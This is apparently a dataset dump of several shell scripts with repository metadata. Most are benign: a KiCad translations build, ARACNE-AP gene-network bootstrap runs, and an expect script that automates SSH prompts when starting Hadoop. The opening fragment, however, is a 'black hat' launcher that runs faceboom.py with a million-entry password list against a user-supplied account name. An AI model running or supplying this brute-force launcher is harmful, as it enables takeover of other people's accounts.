ENDCOLOR="\e[0m"
bold=$(tput bold)
normal=$(tput sgr0)
echo -e "${RED}${bold}HELLO I AM KELIVN HER I AM FROM BLACK HAT Enter the user name/moblenumber/profilename${normal} ${ENDCOLOR}"
read a
python3 faceboom.py -t $a -w 10-million-password-list-top-1000000.txt
| true |
acbf531203b71a9692d247ef57902275af23c6a4 | Shell | wayneandlayne/KiCadMacOSPackaging | /update_install_translations.sh | UTF-8 | 621 | 3.296875 | 3 | [] | no_license | #!/bin/bash
set -e
set -x
export PATH="/usr/local/opt/gettext/bin:$PATH"
BASE=`pwd`
I18N_DIR=i18n
I18N_GIT=https://github.com/KiCad/kicad-i18n.git
I18N_BUILD=build-i18n
if [ ! -d $I18N_DIR ]; then
git clone $I18N_GIT $I18N_DIR
else
cd $I18N_DIR
git checkout master
git pull
cd -
fi
mkdir -p $I18N_BUILD
cd $I18N_BUILD
if [ -d output ]; then
rm -r output;
fi
mkdir -p output
cmake -DCMAKE_INSTALL_PREFIX=output ../$I18N_DIR
make install
cd -
if [ -d support/internat ]; then
rm -r support/internat
fi
mkdir -p support
mkdir -p support/share
cp -r $I18N_BUILD/output/share/kicad/internat support/share/
| true |
1dce9cd06231e57170b9972e87cad70f6dc775c0 | Shell | fumikos/MSKCC | /mytools/run_aracne.sh | UTF-8 | 667 | 2.875 | 3 | [] | no_license | #!/bin/bash
# This program runs ARACNE-AP (https://sourceforge.net/p/aracne-ap/wiki/Home/)
# calculate threshold with a fixed seed and saves in a new directory named "outputFolder"
java -Xmx5G -jar Aracne.jar -e $DATA/expression_lung.txt -o outputFolder --tfs $DATA/regulators.txt --pvalue 1E-8 --seed 1 --calculateThreshold
# run 100 reproducible bootstraps and saves in the output folder
for i in {1..100}; do
java -Xmx5G -jar Aracne.jar -e $DATA/expression_lung.txt -o outputFolder --tfs $DATA/regulators.txt --pvalue 1E-8 --threads 2 --seed $i
done
# consolidate bootstraps in the output folder
java -Xmx5G -jar Aracne.jar -o outputFolder --consolidate
| true |
ed9bf2bb87c09ae543c319fa618446e1a650827d | Shell | lueyoung/hadoop-on-k8s | /scripts/start-dfs-yes.sh | UTF-8 | 597 | 2.71875 | 3 | [] | no_license | #!/usr/bin/expect
set password [lindex $argv 0]
spawn /opt/hadoop/sbin/start-dfs.sh
expect {
#first connect, no public key in ~/.ssh/known_hosts
"Are you sure you want to continue connecting (yes/no)?" {
send "yes\r"
expect "password:"
send "$password\r"
}
#already has public key in ~/.ssh/known_hosts
"password:" {
send "$password\r"
}
"Now try logging into the machine" {
#it has authorized, do nothing!
}
}
expect eof
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.